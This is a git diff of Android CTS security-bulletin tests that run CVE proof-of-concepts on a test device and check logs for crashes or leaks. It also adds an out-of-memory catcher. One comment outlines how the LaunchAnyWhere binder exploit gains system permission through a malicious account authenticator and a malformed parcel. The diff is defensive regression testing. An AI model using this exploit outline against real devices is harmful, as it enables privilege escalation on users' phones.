+ private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = 1024 * 1024; // 1GB
+ private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers =
+ new ConcurrentHashMap<>();
+ private static Map<String, Long> totalMemories = new ConcurrentHashMap<>();
+
+ private boolean isLowMemoryDevice = false;
+
+ private SecurityTestCase context;
+
+ /**
+ * test behavior when oom is detected.
+ */
+ public enum OomBehavior {
+ FAIL_AND_LOG, // normal behavior
+ PASS_AND_LOG, // skip tests that oom low memory devices
+ FAIL_NO_LOG, // tests that check for oom
+ }
+ private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
+ private boolean oomDetected = false; // accessed across threads
+
+ public HostsideOomCatcher(SecurityTestCase context) {
+ this.context = context;
+ }
+
+ /**
+ * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal
+ */
+ private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException {
+ String memInfo = device.executeShellCommand("cat /proc/meminfo");
+ Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
+ Matcher matcher = pattern.matcher(memInfo);
+ if (matcher.find()) {
+ return Long.parseLong(matcher.group(1));
+ } else {
+ throw new RuntimeException("Could not get device memory total");
+ }
+ }
+
+ /**
+ * Start the hostside oom catcher thread for the test.
+ * Match this call to SecurityTestCase.setup().
+ */
+ public synchronized void start() throws Exception {
+ // cache device TotalMem to avoid and adb shell for every test.
+ Long totalMemory = totalMemories.get(getDevice().getSerialNumber());
+ if (totalMemory == null) {
+ totalMemory = getMemTotal(getDevice());
+ totalMemories.put(getDevice().getSerialNumber(), totalMemory);
+ }
+ isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
+
+ // reset test oom behavior
+ // Low memory devices should skip (pass) tests when OOMing and log so that the
+ // high-memory-test flag can be added. Normal devices should fail tests that OOM so that
+ // they'll be ran again with --retry. If the test OOMs because previous tests used the
+ // memory, it will likely pass on a second try.
+ if (isLowMemoryDevice) {
+ oomBehavior = OomBehavior.PASS_AND_LOG;
+ } else {
+ oomBehavior = OomBehavior.FAIL_AND_LOG;
+ }
+ oomDetected = false;
+
+ // Cache OOM detection in separate persistent threads for each device.
+ WeakReference<BackgroundDeviceAction> reference =
+ oomCatchers.get(getDevice().getSerialNumber());
+ BackgroundDeviceAction oomCatcher = null;
+ if (reference != null) {
+ oomCatcher = reference.get();
+ }
+ if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) {
+ AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice());
+
+ oomCatcher = new BackgroundDeviceAction(
+ "logcat -c && logcat OomCatcher:V *:S",
+ "Oom Catcher background thread",
+ getDevice(), new OomReceiver(getDevice()), 0);
+
+ oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher));
+ oomCatcher.start();
+ }
+ }
+
+ /**
+ * Stop the hostside oom catcher thread.
+ * Match this call to SecurityTestCase.setup().
+ */
+ public static void stop(String serial) {
+ WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial);
+ if (reference != null) {
+ BackgroundDeviceAction oomCatcher = reference.get();
+ if (oomCatcher != null) {
+ oomCatcher.cancel();
+ }
+ }
+ }
+
+ /**
+ * Check every test teardown to see if the device oomed during the test.
+ */
+ public synchronized boolean isOomDetected() {
+ return oomDetected;
+ }
+
+ /**
+ * Return the current test behavior for when oom is detected.
+ */
+ public synchronized OomBehavior getOomBehavior() {
+ return oomBehavior;
+ }
+
+ /**
+ * Flag meaning the test will likely fail on devices with low memory.
+ */
+ public synchronized void setHighMemoryTest() {
+ if (isLowMemoryDevice) {
+ oomBehavior = OomBehavior.PASS_AND_LOG;
+ } else {
+ oomBehavior = OomBehavior.FAIL_AND_LOG;
+ }
+ }
+
+ /**
+ * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
+ * intentionally OOMs the device.
+ */
+ public synchronized void setOomTest() {
+ oomBehavior = OomBehavior.FAIL_NO_LOG;
+ }
+
+ private ITestDevice getDevice() {
+ return context.getDevice();
+ }
+
+ /**
+ * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot
+ * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive.
+ */
+ class OomReceiver extends MultiLineReceiver {
+
+ private ITestDevice device = null;
+ private boolean isCancelled = false;
+
+ public OomReceiver(ITestDevice device) {
+ this.device = device;
+ }
+
+ @Override
+ public void processNewLines(String[] lines) {
+ for (String line : lines) {
+ if (Pattern.matches(".*Low memory.*", line)) {
+ // low memory detected, reboot device to clear memory and pass test
+ isCancelled = true;
+ Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
+ "lowmemorykiller detected; rebooting device.");
+ synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected
+ oomDetected = true;
+ }
+ try {
+ device.nonBlockingReboot();
+ device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes
+ context.updateKernelStartTime();
+ } catch (Exception e) {
+ Log.e(LOG_TAG, e.toString());
+ }
+ return; // we don't need to process remaining lines in the array
+ }
+ }
+ }
+
+ @Override
+ public boolean isCancelled() {
+ return isCancelled;
+ }
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java b/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java
new file mode 100644
index 0000000..3a61311
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java
@@ -0,0 +1,93 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+
+/*
+ * Adding Tests:
+ * We are testing a series of exploits that all take advantage of binder in the
+ * same way, using a malformed parcel to get system permission, with the only
+ * difference being the details of how we create the malformed parcel. In order
+ * to take advantage of these similarities (among other reasons) we share code
+ * between these exploits with an app that only requires two things to run a new
+ * version of this exploit: a class implementing IGenerateMalformedParcel and an
+ * intent telling the app which version of the exploit to run.
+ *
+ * When you recieve a new LaunchAnyWhere exploit it will likely be in the form
+ * of an app that can perform a number of actions such as creating a new pin
+ * or installing an app without recieving the appropriate permissions. However,
+ * the only file we care about form the app will be GenMalformedParcel.java.
+ * Find that file and follow these steps to add a new LaunchAnyWhere test:
+ *
+ * 1. Copy GenMalformedParcel.java into the LaunchAnyWhere app at
+ * cts/hostsidetests/security/test-apps/launchanywhere/src... Rename the file
+ * and class after the CVE that you are addressing. Modify the class
+ * signature and method signature so that it implements
+ * IGenerateMalformedParcel (namely, add the `implements` clause and change
+ * the function to public Parcel generate(Intent intent)).
+ *
+ * 2. Next, add a hostside test to the appropriate file in this directory.
+ * In the test all you have to do is call
+ * LaunchSomeWhere.launchSomeWhere("CVE_20XX_XXXXX", getDevice());
+ *
+ * 3. Verify your test and submit, assuming all went well. If not then check
+ * for differences between the files in the submitted apk and the code in
+ * tests/tests/security/src/android/security/cts/launchanywhere.
+ *
+ * Exploit Overview:
+ * All LaunchAnyWhere exploits take advantage of classes that write more data
+ * than they read. They follow the same process to send an intent with system
+ * permissions. The process is described below (you do not need to understand
+ * this in order to create tests, but we learned this while debugging some
+ * things and don't want the information to be lost):
+ *
+ * 1. Add an account with the account type 'com.launchanywhere' When an account
+ * is added the AccountManager delegates the task of authenticating the
+ * account to an instance of AbstractAccountAuthenticator. Our malicious
+ * authenticator finds
+ * android.accounts.IAccountAuthenticatorResponse.Stub.Proxy and replaces
+ * it's mRemote field with our anonymous IBinder before returning a
+ * default-constructed bundle. We save the old value and delegate to it
+ * after altering the arguments when appropriate (MitM).
+ *
+ * 2. When we finish, our IBinder's transact is called. At this point we create
+ * a reboot intent and send it to the appropriate class to generate the
+ * malformed parcel. This grants the intent system permissions.
+ *
+ * 3. The phone reboots, proving a successful exploit.
+ */
+class LaunchSomeWhere {
+ public static void launchSomeWhere(String cve, ITestDevice device)
+ throws Exception {
+
+ String command = "am start";
+
+ String[] args = {
+ "--es", "cve", cve,
+ "-n", "com.android.security.cts.launchanywhere/.StartExploit"
+ };
+
+ for (String s : args) {
+ command += " " + s;
+ }
+
+ AdbUtils.runCommandLine(command, device);
+ if (device.waitForDeviceNotAvailable(9_000))
+ device.waitForDeviceAvailable();
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
index d3da935..9a7e62a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
@@ -23,19 +23,31 @@
/**
* b/26323455
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testPocCVE_2016_2419() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2016-2419", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*IOMX_InfoLeak b26323455[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("IOMX_InfoLeak b26323455", logcat);
}
/**
* b/26324307
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testPocCVE_2016_0844() throws Exception {
AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60);
}
+
+ /**
+ * b/26593930
+ */
+ @SecurityTest(minPatchLevel = "2016-04")
+ public void testPocCVE_2016_2412() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-2412", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> system_server <<<",
+ logcatOut);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index 9a1030d..d866a5a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -23,12 +23,20 @@
/**
* b/27555981
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-05")
public void testPocCVE_2016_2460() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2016-2460", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*IGraphicBufferProducer_Info is Leaked[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("IGraphicBufferProducer_Info is Leaked", logcat);
+ }
+
+ /**
+ * b/27275324
+ */
+ @SecurityTest(minPatchLevel = "2016-05")
+ public void testPocCVE_2015_1805() throws Exception {
+ AdbUtils.runPoc("CVE-2015-1805", getDevice(), 300);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
deleted file mode 100644
index 8c22dfb..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
+++ /dev/null
@@ -1,35 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc16_06 extends SecurityTestCase {
-
- /**
- * b/27364029
- */
- @SecurityTest
- public void testPocCVE_2016_2062() throws Exception {
- if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runCommandLine("logcat -c" , getDevice());
- AdbUtils.runPoc("CVE-2016-2062", getDevice(), 60);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertMatches("[\\s\\n\\S]*CVE-2016-2062 passed[\\s\\n\\S]*", logcat);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index 2601d43..1e33083 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -22,8 +22,20 @@
/**
* b/28740702
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testPocCVE_2016_3818() throws Exception {
AdbUtils.runPoc("CVE-2016-3818", getDevice(), 60);
}
+
+ /**
+ * b/27890802
+ */
+ @SecurityTest(minPatchLevel = "2016-07")
+ public void testPocCVE_2016_3746() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-3746", getDevice(), 60);
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcat);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
index 5cd86bd..3280a68 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
@@ -22,19 +22,8 @@
/**
* b/27773913
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testPocCVE_2016_2471() throws Exception {
AdbUtils.runPoc("CVE-2016-2471", getDevice(), 60);
}
-
- /**
- * b/28760453
- */
- @SecurityTest
- public void testPocCVE_2015_8839() throws Exception {
- AdbUtils.runCommandLine("logcat -c" , getDevice());
- AdbUtils.runPoc("CVE-2015-8839", getDevice(), 60);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertMatches("[\\s\\n\\S]*fallocate result EOPNOTSUPP[\\s\\n\\S]*", logcat);
- }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
deleted file mode 100644
index df116d4..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
+++ /dev/null
@@ -1,113 +0,0 @@
-/**
- * Copyright (C) 2016 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc16_10 extends SecurityTestCase {
-
- /**
- * b/30904789
- */
- @SecurityTest
- public void testPocCVE_2016_6730() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
- }
- }
-
- /**
- * b/30906023
- */
- @SecurityTest
- public void testPocCVE_2016_6731() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
- }
- }
-
- /**
- * b/30906599
- */
- @SecurityTest
- public void testPocCVE_2016_6732() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
- }
- }
-
- /**
- * b/30906694
- */
- @SecurityTest
- public void testPocCVE_2016_6733() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
- }
- }
-
- /**
- * b/30907120
- */
- @SecurityTest
- public void testPocCVE_2016_6734() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
- }
- }
-
- /**
- * b/30907701
- */
- @SecurityTest
- public void testPocCVE_2016_6735() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
- }
- }
-
- /**
- * b/30953284
- */
- @SecurityTest
- public void testPocCVE_2016_6736() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
- }
- }
-
- /**
- * b/30741779
- */
- @SecurityTest
- public void testPocCVE_2016_3916() throws Exception {
- AdbUtils.installApk("/cve_2016_3916.apk", getDevice());
- AdbUtils.runCommandLine("logcat -c" , getDevice());
-
- AdbUtils.runCommandLine("am start -n com.trendmicro.wish_wu.camera2/" +
- "com.trendmicro.wish_wu.camera2.Camera2TestActivity", getDevice());
- Thread.sleep(10000);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
- "[\\s\\n\\S]*>>> /system/bin/" +
- "mediaserver <<<[\\s\\n\\S]*", logcat);
-
- //make sure the app is uninstalled after the test
- AdbUtils.runCommandLine("pm uninstall com.trendmicro.wish_wu.camera2" , getDevice());
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
index d11a759..bb18b0d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
@@ -13,6 +13,7 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
+
package android.security.cts;
import android.platform.test.annotations.SecurityTest;
@@ -23,11 +24,81 @@
/**
* b/29149404
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2012_6702() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.runPoc("CVE-2012-6702", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*fail: encountered same random values![\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("fail: encountered same random values!", logcat);
+ }
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
index 8ae30d6..be17721 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
@@ -23,125 +23,12 @@
//Criticals
/**
- * b/31606947
+ * b/31796940
*/
- @SecurityTest
- public void testPocCVE_2016_8424() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
- }
- }
-
- /**
- * b/31797770
- */
- @SecurityTest
- public void testPocCVE_2016_8425() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
- AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
- }
- }
-
- /**
- * b/31799206
- */
- @SecurityTest
- public void testPocCVE_2016_8426() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
- AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
- }
- }
-
- /**
- * b/31799885
- */
- @SecurityTest
- public void testPocCVE_2016_8427() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
- containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
- AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
- }
- }
-
- /**
- * b/31993456
- */
- @SecurityTest
- public void testPocCVE_2016_8428() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
- }
- }
-
- /**
- * b/32160775
- */
- @SecurityTest
- public void testPocCVE_2016_8429() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
- }
- }
-
- /**
- * b/32225180
- */
- @SecurityTest
- public void testPocCVE_2016_8430() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
- AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
- }
- }
-
- /**
- * b/32402179
- */
- @SecurityTest
- public void testPocCVE_2016_8431() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
- }
- }
-
- /**
- * b/32447738
- */
- @SecurityTest
- public void testPocCVE_2016_8432() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
- }
- }
-
- /**
- * b/32125137
- */
- @SecurityTest
- public void testPocCVE_2016_8434() throws Exception {
- if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- // This poc is very verbose so we ignore the output to avoid using a lot of memory.
- AdbUtils.runPocNoOutput("CVE-2016-8434", getDevice(), 60);
- }
- }
-
- /**
- * b/31668540
- */
- @SecurityTest
- public void testPocCVE_2016_8460() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
- assertTrue(!result.equals("Vulnerable"));
- }
- }
-
- /**
- * b/32659848
- */
- @SecurityTest
- public void testPoc32659848() throws Exception {
- String command =
- "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
- AdbUtils.runCommandLine(command, getDevice());
+ @SecurityTest(minPatchLevel = "2016-12")
+ public void testPocCVE_2016_8406() throws Exception {
+ String cmd ="ls -l /sys/kernel/slab 2>/dev/null | grep nf_conn";
+ String result = AdbUtils.runCommandLine(cmd ,getDevice());
+ assertNotMatchesMultiLine("nf_conntrack_(?!0{8})[A-Fa-f0-9]{8}", result);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
index 4fd98b7..629f83f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
@@ -21,13 +21,107 @@
@SecurityTest
public class Poc17_01 extends SecurityTestCase {
+ //Criticals
/**
- * b/31799863
+ * b/31797770
*/
- @SecurityTest
- public void testPocCVE_2016_8482() throws Exception {
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8428() throws Exception {
if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ // This poc is very verbose so we ignore the output to avoid using a lot of memory.
+ AdbUtils.runPocNoOutput("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
}
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
index 44f7d27..e2e5134 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
@@ -22,11 +22,33 @@
/**
* b/32799236
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testPocCVE_2017_0426() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.runPoc("CVE-2017-0426", getDevice(), 60);
String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Bugreports file in wrong path[\\s\\n\\S]*", logcatOut);
+ assertNotMatchesMultiLine("Bugreports file in wrong path", logcatOut);
}
+
+ /**
+ * b/32706020
+ */
+ @SecurityTest(minPatchLevel = "2017-02")
+ public void testPocCVE_2017_0415() throws Exception {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runPoc("CVE-2017-0415", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcatOut);
+ }
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest(minPatchLevel = "2017-02")
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
